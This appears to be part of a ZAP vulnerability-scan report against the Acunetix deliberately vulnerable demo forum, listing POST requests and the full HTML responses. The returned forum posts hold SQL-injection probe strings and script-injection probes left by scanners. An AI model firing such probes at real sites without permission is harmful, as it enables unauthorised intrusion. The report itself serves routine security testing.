Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3190 |
Response Body - size: 3,190 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum "acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555'"()&%<acx><ScRiPt >V7NV(9847)</ScRiPt></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3097 |
Response Body - size: 3,097 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'"()&%<acx><ScRiPt >V7NV(9478)</ScRiPt></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3068 |
Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>5559996333</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3178 |
Response Body - size: 3,178 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
